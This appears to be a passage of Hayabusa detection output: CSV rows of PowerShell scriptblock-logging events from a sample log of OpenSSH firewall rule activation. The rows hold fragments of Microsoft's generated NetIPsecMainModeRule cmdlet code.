[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 